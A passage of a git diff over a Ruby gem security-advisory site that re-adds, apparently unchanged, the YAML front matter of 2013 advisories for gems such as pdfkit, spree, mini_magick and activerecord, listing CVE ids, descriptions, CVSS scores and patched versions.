+title: 'OSVDB-115091 (bundler): Bundler Gem for Ruby Redirection Remote HTTP Basic
+  Authentication Credential Disclosure'
+comments: false
+categories:
+- bundler
+advisory:
+  gem: bundler
+  osvdb: 115091
+  url: https://github.com/rubygems/bundler/releases/tag/v1.3.0.pre.8
+  title: Bundler Gem for Ruby Redirection Remote HTTP Basic Authentication Credential
+    Disclosure
+  date: 2013-02-12
+  description: |
+    Bundler Gem for Ruby contains a flaw that is triggered during the
+    redirection to other hosts. This may allow a remote attacker to
+    gain access to HTTP basic authentication credential information.
+  patched_versions:
+  - ">= 1.3.0.pre.8"
+  related:
+    url:
+    - https://github.com/rubygems/bundler/releases/tag/v1.3.0.pre.8
+    - https://my.diffend.io/gems/bundler/1.3.0.pre.7/1.3.0.pre.8
+    - https://my.diffend.io/gems/bundler/versions/1.0.0.beta.8
+    - http://www.osvdb.org/show/osvdb/115091
+---
diff --git a/advisories/_posts/2013-02-19-CVE-2013-1756.md b/advisories/_posts/2013-02-19-CVE-2013-1756.md
index 045386e7..3724c244 100644
--- a/advisories/_posts/2013-02-19-CVE-2013-1756.md
+++ b/advisories/_posts/2013-02-19-CVE-2013-1756.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2013-1756 (fog-dragonfly): Dragonfly Gem for Ruby Crafted Request Parsing
-  Remote Code Execution'
-comments: false
-categories:
-- fog-dragonfly
-advisory:
-  gem: fog-dragonfly
-  cve: 2013-1756
-  osvdb: 90647
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1756
-  title: Dragonfly Gem for Ruby Crafted Request Parsing Remote Code Execution
-  date: 2013-02-19
-  description: |
-    Dragonfly Gem for Ruby contains a flaw that is triggered during the parsing
-    of a specially crafted request. This may allow a remote attacker to execute
-    arbitrary code.
-
-    This gem has been renamed. Please use "dragonfly" from now on.
-  cvss_v2: 7.5
-  unaffected_versions:
-  - "< 0.7.0"
-  patched_versions:
-  - ">= 0.9.14"
----
+---
+layout: advisory
+title: 'CVE-2013-1756 (fog-dragonfly): Dragonfly Gem for Ruby Crafted Request Parsing
+  Remote Code Execution'
+comments: false
+categories:
+- fog-dragonfly
+advisory:
+  gem: fog-dragonfly
+  cve: 2013-1756
+  osvdb: 90647
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1756
+  title: Dragonfly Gem for Ruby Crafted Request Parsing Remote Code Execution
+  date: 2013-02-19
+  description: |
+    Dragonfly Gem for Ruby contains a flaw that is triggered during the parsing
+    of a specially crafted request. This may allow a remote attacker to execute
+    arbitrary code.
+
+    This gem has been renamed. Please use "dragonfly" from now on.
+  cvss_v2: 7.5
+  unaffected_versions:
+  - "< 0.7.0"
+  patched_versions:
+  - ">= 0.9.14"
+---
diff --git a/advisories/_posts/2013-02-21-CVE-2013-0162.md b/advisories/_posts/2013-02-21-CVE-2013-0162.md
index 0c9e6479..c18da56e 100644
--- a/advisories/_posts/2013-02-21-CVE-2013-0162.md
+++ b/advisories/_posts/2013-02-21-CVE-2013-0162.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-0162 (ruby_parser): CVE-2013-0162 rubygem-ruby_parser: incorrect
-  temporary file usage'
-comments: false
-categories:
-- ruby_parser
-advisory:
-  gem: ruby_parser
-  cve: 2013-0162
-  osvdb: 90561
-  ghsa: 8mvw-22r7-w6fq
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0162
-  title: 'CVE-2013-0162 rubygem-ruby_parser: incorrect temporary file usage'
-  date: 2013-02-21
-  description: |
-    The diff_pp function in lib/gauntlet_rubyparser.rb in the ruby_parser
-    gem 3.1.1 and earlier for Ruby allows local users to overwrite arbitrary files via
-    a symlink attack on a temporary file with a predictable name in /tmp.
-  cvss_v2: 2.1
-  patched_versions:
-  - ">= 3.1.2"
----
+---
+layout: advisory
+title: 'CVE-2013-0162 (ruby_parser): CVE-2013-0162 rubygem-ruby_parser: incorrect
+  temporary file usage'
+comments: false
+categories:
+- ruby_parser
+advisory:
+  gem: ruby_parser
+  cve: 2013-0162
+  osvdb: 90561
+  ghsa: 8mvw-22r7-w6fq
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0162
+  title: 'CVE-2013-0162 rubygem-ruby_parser: incorrect temporary file usage'
+  date: 2013-02-21
+  description: |
+    The diff_pp function in lib/gauntlet_rubyparser.rb in the ruby_parser
+    gem 3.1.1 and earlier for Ruby allows local users to overwrite arbitrary files via
+    a symlink attack on a temporary file with a predictable name in /tmp.
+  cvss_v2: 2.1
+  patched_versions:
+  - ">= 3.1.2"
+---
diff --git a/advisories/_posts/2013-02-21-CVE-2013-1607.md b/advisories/_posts/2013-02-21-CVE-2013-1607.md
index 1089ce24..d80f440f 100644
--- a/advisories/_posts/2013-02-21-CVE-2013-1607.md
+++ b/advisories/_posts/2013-02-21-CVE-2013-1607.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2013-1607 (pdfkit): PDFKit Gem for Ruby PDF File Generation Parameter
-  Handling Remote Code Execution'
-comments: false
-categories:
-- pdfkit
-advisory:
-  gem: pdfkit
-  cve: 2013-1607
-  osvdb: 90867
-  ghsa: 39v7-xpq4-8884
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1607
-  title: PDFKit Gem for Ruby PDF File Generation Parameter Handling Remote Code Execution
-  date: 2013-02-21
-  description: |
-    PDFKit Gem for Ruby contains a flaw that is due to the program failing
-    to properly validate input during the handling of parameters when generating PDF
-    files. This may allow a remote attacker to potentially execute arbitrary code via
-    the pdfkit generation options.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 0.5.3"
----
+---
+layout: advisory
+title: 'CVE-2013-1607 (pdfkit): PDFKit Gem for Ruby PDF File Generation Parameter
+  Handling Remote Code Execution'
+comments: false
+categories:
+- pdfkit
+advisory:
+  gem: pdfkit
+  cve: 2013-1607
+  osvdb: 90867
+  ghsa: 39v7-xpq4-8884
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1607
+  title: PDFKit Gem for Ruby PDF File Generation Parameter Handling Remote Code Execution
+  date: 2013-02-21
+  description: |
+    PDFKit Gem for Ruby contains a flaw that is due to the program failing
+    to properly validate input during the handling of parameters when generating PDF
+    files. This may allow a remote attacker to potentially execute arbitrary code via
+    the pdfkit generation options.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 0.5.3"
+---
diff --git a/advisories/_posts/2013-02-21-CVE-2013-1656.md b/advisories/_posts/2013-02-21-CVE-2013-1656.md
index 88b3a886..af13d073 100644
--- a/advisories/_posts/2013-02-21-CVE-2013-1656.md
+++ b/advisories/_posts/2013-02-21-CVE-2013-1656.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2013-1656 (spree): Spree controller Parameter Arbitrary Ruby Object Instantiation
-  Command Execution'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  cve: 2013-1656
-  ghsa: jxx8-v83v-rhw3
-  url: https://github.com/advisories/GHSA-jxx8-v83v-rhw3
-  title: Spree controller Parameter Arbitrary Ruby Object Instantiation Command Execution
-  date: 2013-02-21
-  description: |
-    Spree Commerce 1.0.x before 2.0.0.rc1 allows remote authenticated
-    administrators to instantiate arbitrary Ruby objects and executd
-    arbitrary commands via the
-    (1) payment_method parameter to core/app/controllers/spree/admin/
-        payment_methods_controller.rb; and the
-    (2) promotion_action parameter to promotion_actions_controller.rb,
-    (3) promotion_rule parameter to promotion_rules_controller.rb, and
-    (4) calculator_type parameter to promotions_controller.rb in
-        promo/app/controllers/spree/admin/, related to unsafe use
-        of the constantize function.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 2.0.0.rc1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2013-1656
-    - https://github.com/spree/spree/commit/70092eb55b8be8fe5d21a7658b62da658612fba7
-    - https://web.archive.org/web/20130907044454/https://www.conviso.com.br/advisories/CVE-2013-1656.txt
-    - https://web.archive.org/web/20140329142330/http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
-    - https://web.archive.org/web/20140618100330/http://blog.conviso.com.br/2013/03/spree-commerce-multiple-unsafe.html
-    - https://github.com/advisories/GHSA-jxx8-v83v-rhw3
----
+---
+layout: advisory
+title: 'CVE-2013-1656 (spree): Spree controller Parameter Arbitrary Ruby Object Instantiation
+  Command Execution'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  cve: 2013-1656
+  ghsa: jxx8-v83v-rhw3
+  url: https://github.com/advisories/GHSA-jxx8-v83v-rhw3
+  title: Spree controller Parameter Arbitrary Ruby Object Instantiation Command Execution
+  date: 2013-02-21
+  description: |
+    Spree Commerce 1.0.x before 2.0.0.rc1 allows remote authenticated
+    administrators to instantiate arbitrary Ruby objects and executd
+    arbitrary commands via the
+    (1) payment_method parameter to core/app/controllers/spree/admin/
+        payment_methods_controller.rb; and the
+    (2) promotion_action parameter to promotion_actions_controller.rb,
+    (3) promotion_rule parameter to promotion_rules_controller.rb, and
+    (4) calculator_type parameter to promotions_controller.rb in
+        promo/app/controllers/spree/admin/, related to unsafe use
+        of the constantize function.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 2.0.0.rc1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-1656
+    - https://github.com/spree/spree/commit/70092eb55b8be8fe5d21a7658b62da658612fba7
+    - https://web.archive.org/web/20130907044454/https://www.conviso.com.br/advisories/CVE-2013-1656.txt
+    - https://web.archive.org/web/20140329142330/http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
+    - https://web.archive.org/web/20140618100330/http://blog.conviso.com.br/2013/03/spree-commerce-multiple-unsafe.html
+    - https://github.com/advisories/GHSA-jxx8-v83v-rhw3
+---
diff --git a/advisories/_posts/2013-02-21-CVE-2013-2506.md b/advisories/_posts/2013-02-21-CVE-2013-2506.md
index f953232c..a8205d8b 100644
--- a/advisories/_posts/2013-02-21-CVE-2013-2506.md
+++ b/advisories/_posts/2013-02-21-CVE-2013-2506.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2013-2506 (spree_auth_devise): Spree app/models/spree/user.rb Mass Role
-  Assignment Remote Privilege Escalation'
-comments: false
-categories:
-- spree_auth_devise
-advisory:
-  gem: spree_auth_devise
-  cve: 2013-2506
-  osvdb: 90865
-  ghsa: jp57-9j37-5476
-  url: https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
-  title: Spree app/models/spree/user.rb Mass Role Assignment Remote Privilege Escalation
-  date: 2013-02-21
-  description: |
-    Spree contains a flaw that leads to unauthorized privileges being gained. The
-    issue is triggered as certain input related to mass role assignment in
-    app/models/spree/user.rb is not properly verified before being used to update
-    a user. This may allow a remote attacker to assign arbitrary roles and gain
-    elevated administrative privileges.
-  cvss_v2: 4.0
-  patched_versions:
-  - "~> 1.1.6"
-  - "~> 1.2.0"
-  - ">= 1.3.0"
----
+---
+layout: advisory
+title: 'CVE-2013-2506 (spree_auth_devise): Spree app/models/spree/user.rb Mass Role
+  Assignment Remote Privilege Escalation'
+comments: false
+categories:
+- spree_auth_devise
+advisory:
+  gem: spree_auth_devise
+  cve: 2013-2506
+  osvdb: 90865
+  ghsa: jp57-9j37-5476
+  url: https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
+  title: Spree app/models/spree/user.rb Mass Role Assignment Remote Privilege Escalation
+  date: 2013-02-21
+  description: |
+    Spree contains a flaw that leads to unauthorized privileges being gained. The
+    issue is triggered as certain input related to mass role assignment in
+    app/models/spree/user.rb is not properly verified before being used to update
+    a user. This may allow a remote attacker to assign arbitrary roles and gain
+    elevated administrative privileges.
+  cvss_v2: 4.0
+  patched_versions:
+  - "~> 1.1.6"
+  - "~> 1.2.0"
+  - ">= 1.3.0"
+---
diff --git a/advisories/_posts/2013-02-25-GHSA-5qw5-wf2q-f538.md b/advisories/_posts/2013-02-25-GHSA-5qw5-wf2q-f538.md
index 06349f0a..cca3e601 100644
--- a/advisories/_posts/2013-02-25-GHSA-5qw5-wf2q-f538.md
+++ b/advisories/_posts/2013-02-25-GHSA-5qw5-wf2q-f538.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'GHSA-5qw5-wf2q-f538 (activerecord-jdbc-adapter): ActiveRecord-JDBC-Adapter
-  (AR-JDBC) lib/arjdbc/jdbc/adapter.rb sql.gsub() Function SQL Injection'
-comments: false
-categories:
-- activerecord-jdbc-adapter
-- jruby
-advisory:
-  gem: activerecord-jdbc-adapter
-  platform: jruby
-  osvdb: 114854
-  ghsa: 5qw5-wf2q-f538
-  url: https://github.com/advisories/GHSA-5qw5-wf2q-f538
-  title: ActiveRecord-JDBC-Adapter (AR-JDBC) lib/arjdbc/jdbc/adapter.rb sql.gsub()
-    Function SQL Injection
-  date: 2013-02-25
-  description: |
-    ActiveRecord-JDBC-Adapter (AR-JDBC) contains a flaw that may allow carrying
-    out an SQL injection attack. The issue is due to the sql.gsub() function in
-    lib/arjdbc/jdbc/adapter.rb not properly sanitizing user-supplied input before
-    using it in SQL queries. This may allow a remote attacker to inject or
-    manipulate SQL queries in the back-end database, allowing for the
-    manipulation or disclosure of arbitrary data.
-  unaffected_versions:
-  - "< 1.2.6"
-  patched_versions:
-  - ">= 1.2.8"
-  related:
-    url:
-    - https://github.com/jruby/activerecord-jdbc-adapter/issues/322
-    - https://github.com/jruby/activerecord-jdbc-adapter/blob/master/lib/arjdbc/jdbc/adapter.rb
-    - https://my.diffend.io/gems/activerecord-jdbc-adapter/1.2.5/1.2.8
-    - https://security.snyk.io/vuln/SNYK-RUBY-ACTIVERECORDJDBCADAPTER-20076
-    - https://advisories.gitlab.com/pkg/gem/activerecord-jdbc-adapter/GHSA-5qw5-wf2q-f538
-    - https://github.com/advisories/GHSA-5qw5-wf2q-f538
-  notes: "- No CVE, CVSS values.\n"
----
+---
+layout: advisory
+title: 'GHSA-5qw5-wf2q-f538 (activerecord-jdbc-adapter): ActiveRecord-JDBC-Adapter
+  (AR-JDBC) lib/arjdbc/jdbc/adapter.rb sql.gsub() Function SQL Injection'
+comments: false
+categories:
+- activerecord-jdbc-adapter
+- jruby
+advisory:
+  gem: activerecord-jdbc-adapter
+  platform: jruby
+  osvdb: 114854
+  ghsa: 5qw5-wf2q-f538
+  url: https://github.com/advisories/GHSA-5qw5-wf2q-f538
+  title: ActiveRecord-JDBC-Adapter (AR-JDBC) lib/arjdbc/jdbc/adapter.rb sql.gsub()
+    Function SQL Injection
+  date: 2013-02-25
+  description: |
+    ActiveRecord-JDBC-Adapter (AR-JDBC) contains a flaw that may allow carrying
+    out an SQL injection attack. The issue is due to the sql.gsub() function in
+    lib/arjdbc/jdbc/adapter.rb not properly sanitizing user-supplied input before
+    using it in SQL queries. This may allow a remote attacker to inject or
+    manipulate SQL queries in the back-end database, allowing for the
+    manipulation or disclosure of arbitrary data.
+  unaffected_versions:
+  - "< 1.2.6"
+  patched_versions:
+  - ">= 1.2.8"
+  related:
+    url:
+    - https://github.com/jruby/activerecord-jdbc-adapter/issues/322
+    - https://github.com/jruby/activerecord-jdbc-adapter/blob/master/lib/arjdbc/jdbc/adapter.rb
+    - https://my.diffend.io/gems/activerecord-jdbc-adapter/1.2.5/1.2.8
+    - https://security.snyk.io/vuln/SNYK-RUBY-ACTIVERECORDJDBCADAPTER-20076
+    - https://advisories.gitlab.com/pkg/gem/activerecord-jdbc-adapter/GHSA-5qw5-wf2q-f538
+    - https://github.com/advisories/GHSA-5qw5-wf2q-f538
+  notes: "- No CVE, CVSS values.\n"
+---
diff --git a/advisories/_posts/2013-02-28-CVE-2013-2512.md b/advisories/_posts/2013-02-28-CVE-2013-2512.md
index 74ba5325..c358b803 100644
--- a/advisories/_posts/2013-02-28-CVE-2013-2512.md
+++ b/advisories/_posts/2013-02-28-CVE-2013-2512.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-2512 (ftpd): ftpd Gem for Ruby Shell Character Handling Remote Command
-  Injection'
-comments: false
-categories:
-- ftpd
-advisory:
-  gem: ftpd
-  cve: 2013-2512
-  osvdb: 90784
-  ghsa: 7vxr-6cxg-j3x8
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2512
-  title: ftpd Gem for Ruby Shell Character Handling Remote Command Injection
-  date: 2013-02-28
-  description: |
-    ftpd Gem for Ruby contains a flaw that is triggered when handling a
-    specially crafted option or filename that contains a shell
-    character. This may allow a remote attacker to inject arbitrary
-    commands.
-  cvss_v2: 9.0
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 0.2.2"
----
+---
+layout: advisory
+title: 'CVE-2013-2512 (ftpd): ftpd Gem for Ruby Shell Character Handling Remote Command
+  Injection'
+comments: false
+categories:
+- ftpd
+advisory:
+  gem: ftpd
+  cve: 2013-2512
+  osvdb: 90784
+  ghsa: 7vxr-6cxg-j3x8
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2512
+  title: ftpd Gem for Ruby Shell Character Handling Remote Command Injection
+  date: 2013-02-28
+  description: |
+    ftpd Gem for Ruby contains a flaw that is triggered when handling a
+    specially crafted option or filename that contains a shell
+    character. This may allow a remote attacker to inject arbitrary
+    commands.
+  cvss_v2: 9.0
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 0.2.2"
+---
diff --git a/advisories/_posts/2013-02-28-CVE-2013-2516.md b/advisories/_posts/2013-02-28-CVE-2013-2516.md
index e2c2a29f..ed274446 100644
--- a/advisories/_posts/2013-02-28-CVE-2013-2516.md
+++ b/advisories/_posts/2013-02-28-CVE-2013-2516.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2013-2516 (fileutils): fileutils Gem for Ruby file_utils.rb Crafted URL
-  Handling Remote Command Execution'
-comments: false
-categories:
-- fileutils
-advisory:
-  gem: fileutils
-  cve: 2013-2516
-  osvdb: 90717
-  ghsa: 9x97-x2p9-hvpf
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2516
-  title: fileutils Gem for Ruby file_utils.rb Crafted URL Handling Remote Command
-    Execution
-  date: 2013-02-28
-  description: |
-    fileutils Gem for Ruby contains a flaw in file_utils.rb. The issue is
-    triggered when handling a specially crafted URL containing a command after a delimiter
-    (;). This may allow a remote attacker to potentially execute arbitrary commands.
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 0.7.1"
----
+---
+layout: advisory
+title: 'CVE-2013-2516 (fileutils): fileutils Gem for Ruby file_utils.rb Crafted URL
+  Handling Remote Command Execution'
+comments: false
+categories:
+- fileutils
+advisory:
+  gem: fileutils
+  cve: 2013-2516
+  osvdb: 90717
+  ghsa: 9x97-x2p9-hvpf
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2516
+  title: fileutils Gem for Ruby file_utils.rb Crafted URL Handling Remote Command
+    Execution
+  date: 2013-02-28
+  description: |
+    fileutils Gem for Ruby contains a flaw in file_utils.rb. The issue is
+    triggered when handling a specially crafted URL containing a command after a delimiter
+    (;). This may allow a remote attacker to potentially execute arbitrary commands.
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 0.7.1"
+---
diff --git a/advisories/_posts/2013-03-04-CVE-2013-2513.md b/advisories/_posts/2013-03-04-CVE-2013-2513.md
index 6451252e..9f33979f 100644
--- a/advisories/_posts/2013-03-04-CVE-2013-2513.md
+++ b/advisories/_posts/2013-03-04-CVE-2013-2513.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2013-2513 (flash_tool): flash_tool Gem for Ruby File Download Handling
-  Arbitrary Command Execution'
-comments: false
-categories:
-- flash_tool
-advisory:
-  gem: flash_tool
-  cve: 2013-2513
-  osvdb: 90829
-  ghsa: 6325-6g32-7p35
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2513
-  title: flash_tool Gem for Ruby File Download Handling Arbitrary Command Execution
-  date: 2013-03-04
-  description: |
-    flash_tool Gem for Ruby contains a flaw that is triggered during the
-    handling of downloaded files that contain shell characters. With a specially crafted
-    file, a context-dependent attacker can execute arbitrary commands.
-  cvss_v3: 9.8
----
+---
+layout: advisory
+title: 'CVE-2013-2513 (flash_tool): flash_tool Gem for Ruby File Download Handling
+  Arbitrary Command Execution'
+comments: false
+categories:
+- flash_tool
+advisory:
+  gem: flash_tool
+  cve: 2013-2513
+  osvdb: 90829
+  ghsa: 6325-6g32-7p35
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2513
+  title: flash_tool Gem for Ruby File Download Handling Arbitrary Command Execution
+  date: 2013-03-04
+  description: |
+    flash_tool Gem for Ruby contains a flaw that is triggered during the
+    handling of downloaded files that contain shell characters. With a specially crafted
+    file, a context-dependent attacker can execute arbitrary commands.
+  cvss_v3: 9.8
+---
diff --git a/advisories/_posts/2013-03-12-CVE-2013-2616.md b/advisories/_posts/2013-03-12-CVE-2013-2616.md
index 64acf68c..7d628441 100644
--- a/advisories/_posts/2013-03-12-CVE-2013-2616.md
+++ b/advisories/_posts/2013-03-12-CVE-2013-2616.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2013-2616 (mini_magick): MiniMagick Gem for Ruby URI Handling Arbitrary
-  Command Injection'
-comments: false
-categories:
-- mini_magick
-advisory:
-  gem: mini_magick
-  cve: 2013-2616
-  osvdb: 91231
-  ghsa: w754-gq8r-pf5f
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2616
-  title: MiniMagick Gem for Ruby URI Handling Arbitrary Command Injection
-  date: 2013-03-12
-  description: |
-    MiniMagick Gem for Ruby contains a flaw that is triggered during the handling
-    of specially crafted input from an untrusted source passed via a URL that
-    contains a ';' character. This may allow a context-dependent attacker to
-    potentially execute arbitrary commands.
-  cvss_v2: 9.3
-  patched_versions:
-  - ">= 3.6.0"
----
+---
+layout: advisory
+title: 'CVE-2013-2616 (mini_magick): MiniMagick Gem for Ruby URI Handling Arbitrary
+  Command Injection'
+comments: false
+categories:
+- mini_magick
+advisory:
+  gem: mini_magick
+  cve: 2013-2616
+  osvdb: 91231
+  ghsa: w754-gq8r-pf5f
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2616
+  title: MiniMagick Gem for Ruby URI Handling Arbitrary Command Injection
+  date: 2013-03-12
+  description: |
+    MiniMagick Gem for Ruby contains a flaw that is triggered during the handling
+    of specially crafted input from an untrusted source passed via a URL that
+    contains a ';' character. This may allow a context-dependent attacker to
+    potentially execute arbitrary commands.
+  cvss_v2: 9.3
+  patched_versions:
+  - ">= 3.6.0"
+---
diff --git a/advisories/_posts/2013-03-12-CVE-2013-2617.md b/advisories/_posts/2013-03-12-CVE-2013-2617.md
index 45174d1b..9008e63a 100644
--- a/advisories/_posts/2013-03-12-CVE-2013-2617.md
+++ b/advisories/_posts/2013-03-12-CVE-2013-2617.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2013-2617 (curl): CVE-2013-2617 rubygem-curl: insufficient URL escaping
-  command injection'
-comments: false
-categories:
-- curl
-advisory:
-  gem: curl
-  cve: 2013-2617
-  osvdb: 91230
-  ghsa: hxx6-p24v-wg8c
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2617
-  title: 'CVE-2013-2617 rubygem-curl: insufficient URL escaping command injection'
-  date: 2013-03-12
-  description: |
-    lib/curl.rb in the Curl Gem for Ruby allows remote attackers to execute
-    arbitrary commands via shell metacharacters in a URL.
-  cvss_v2: 7.5
----
+---
+layout: advisory
+title: 'CVE-2013-2617 (curl): CVE-2013-2617 rubygem-curl: insufficient URL escaping
+  command injection'
+comments: false
+categories:
+- curl
+advisory:
+  gem: curl
+  cve: 2013-2617
+  osvdb: 91230
+  ghsa: hxx6-p24v-wg8c
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2617
+  title: 'CVE-2013-2617 rubygem-curl: insufficient URL escaping command injection'
+  date: 2013-03-12
+  description: |
+    lib/curl.rb in the Curl Gem for Ruby allows remote attackers to execute
+    arbitrary commands via shell metacharacters in a URL.
+  cvss_v2: 7.5
+---
diff --git a/advisories/_posts/2013-03-13-CVE-2013-2615.md b/advisories/_posts/2013-03-13-CVE-2013-2615.md
index 416827ea..8fc73fd2 100644
--- a/advisories/_posts/2013-03-13-CVE-2013-2615.md
+++ b/advisories/_posts/2013-03-13-CVE-2013-2615.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2013-2615 (fastreader): fastreader Gem for Ruby URI Handling Arbitrary
-  Command Injection'
-comments: false
-categories:
-- fastreader
-advisory:
-  gem: fastreader
-  cve: 2013-2615
-  osvdb: 91232
-  ghsa: w248-xr37-jx8m
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2615
-  title: fastreader Gem for Ruby URI Handling Arbitrary Command Injection
-  date: 2013-03-13
-  description: |
-    fastreader Gem for Ruby contains a flaw that is triggered during the handling
-    of specially crafted input passed via a URL that contains a ';' character.
-    This may allow a context-dependent attacker to potentially execute arbitrary
-    commands.
-  cvss_v2: 9.3
----
+---
+layout: advisory
+title: 'CVE-2013-2615 (fastreader): fastreader Gem for Ruby URI Handling Arbitrary
+  Command Injection'
+comments: false
+categories:
+- fastreader
+advisory:
+  gem: fastreader
+  cve: 2013-2615
+  osvdb: 91232
+  ghsa: w248-xr37-jx8m
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2615
+  title: fastreader Gem for Ruby URI Handling Arbitrary Command Injection
+  date: 2013-03-13
+  description: |
+    fastreader Gem for Ruby contains a flaw that is triggered during the handling
+    of specially crafted input passed via a URL that contains a ';' character.
+    This may allow a context-dependent attacker to potentially execute arbitrary
+    commands.
+  cvss_v2: 9.3
+---
diff --git a/advisories/_posts/2013-03-18-CVE-2013-1875.md b/advisories/_posts/2013-03-18-CVE-2013-1875.md
index f4be2687..e01ee08a 100644
--- a/advisories/_posts/2013-03-18-CVE-2013-1875.md
+++ b/advisories/_posts/2013-03-18-CVE-2013-1875.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2013-1875 (command_wrap): command_wrap Gem for Ruby URI Handling Arbitrary
-  Command Injection'
-comments: false
-categories:
-- command_wrap
-advisory:
-  gem: command_wrap
-  cve: 2013-1875
-  osvdb: 91450
-  ghsa: p673-hjf2-pwfr
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1875
-  title: command_wrap Gem for Ruby URI Handling Arbitrary Command Injection
-  date: 2013-03-18
-  description: |
-    command_wrap Gem for Ruby contains a flaw that is triggered during the
-    handling of input passed via the URL that contains a semicolon character (;). This
-    will allow a remote attacker to inject arbitrary commands and have them executed
-    in the context of the user clicking it.
-  cvss_v2: 7.5
----
+---
+layout: advisory
+title: 'CVE-2013-1875 (command_wrap): command_wrap Gem for Ruby URI Handling Arbitrary
+  Command Injection'
+comments: false
+categories:
+- command_wrap
+advisory:
+  gem: command_wrap
+  cve: 2013-1875
+  osvdb: 91450
+  ghsa: p673-hjf2-pwfr
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1875
+  title: command_wrap Gem for Ruby URI Handling Arbitrary Command Injection
+  date: 2013-03-18
+  description: |
+    command_wrap Gem for Ruby contains a flaw that is triggered during the
+    handling of input passed via the URL that contains a semicolon character (;). This
+    will allow a remote attacker to inject arbitrary commands and have them executed
+    in the context of the user clicking it.
+  cvss_v2: 7.5
+---
diff --git a/advisories/_posts/2013-03-19-CVE-2013-1854.md b/advisories/_posts/2013-03-19-CVE-2013-1854.md
index 86d1d241..a0df1d02 100644
--- a/advisories/_posts/2013-03-19-CVE-2013-1854.md
+++ b/advisories/_posts/2013-03-19-CVE-2013-1854.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2013-1854 (activerecord): CVE-2013-1854 rubygem-activerecord: attribute_dos
-  Symbol DoS vulnerability'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2013-1854
-  osvdb: 91453
-  ghsa: 3crr-9vmg-864v
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1854
-  title: 'CVE-2013-1854 rubygem-activerecord: attribute_dos Symbol DoS vulnerability'
-  date: 2013-03-19
-  description: |
-    The Active Record component in Ruby on Rails 2.3.x before 2.3.18, 3.1.x
-    before 3.1.12, and 3.2.x before 3.2.13 processes certain queries by converting hash
-    keys to symbols, which allows remote attackers to cause a denial of service via
-    crafted input to a where method. A flaw was found in the way Ruby on Rails handled
-    hashes in certain queries. A remote attacker could use this flaw to perform a denial
-    of service (resource consumption) attack by sending specially crafted queries that
-    would result in the creation of Ruby symbols, which were never garbage collected.
-  cvss_v2: 7.8
-  unaffected_versions:
-  - "~> 3.0.0"
-  patched_versions:
-  - "~> 2.3.18"
-  - "~> 3.1.12"
-  - ">= 3.2.13"
----
+---
+layout: advisory
+title: 'CVE-2013-1854 (activerecord): CVE-2013-1854 rubygem-activerecord: attribute_dos
+  Symbol DoS vulnerability'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2013-1854
+  osvdb: 91453
+  ghsa: 3crr-9vmg-864v
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1854
+  title: 'CVE-2013-1854 rubygem-activerecord: attribute_dos Symbol DoS vulnerability'
+  date: 2013-03-19
+  description: |
+    The Active Record component in Ruby on Rails 2.3.x before 2.3.18, 3.1.x
+    before 3.1.12, and 3.2.x before 3.2.13 processes certain queries by converting hash
+    keys to symbols, which allows remote attackers to cause a denial of service via
+    crafted input to a where method. A flaw was found in the way Ruby on Rails handled
+    hashes in certain queries. A remote attacker could use this flaw to perform a denial
+    of service (resource consumption) attack by sending specially crafted queries that
+    would result in the creation of Ruby symbols, which were never garbage collected.
+  cvss_v2: 7.8
+  unaffected_versions:
+  - "~> 3.0.0"
+  patched_versions:
